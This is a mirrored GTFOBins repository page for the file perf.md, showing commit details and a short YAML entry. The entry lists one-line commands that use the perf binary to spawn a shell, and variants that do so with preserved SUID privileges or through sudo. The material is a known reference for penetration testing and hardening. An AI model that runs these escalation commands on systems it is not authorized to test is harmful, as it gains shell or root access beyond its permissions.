1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-10-18 05:18:13 +02:00
GTFOBins.github.io/_gtfobins/perf.md
Kiran Ghimire a981bc1968
Add perf
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-10-26 21:48:59 +02:00

13 lines
174 B
Markdown

---
functions:
shell:
- code: |
perf stat /bin/sh
suid:
- code: |
./perf stat /bin/sh -p
sudo:
- code: |
sudo perf stat /bin/sh
---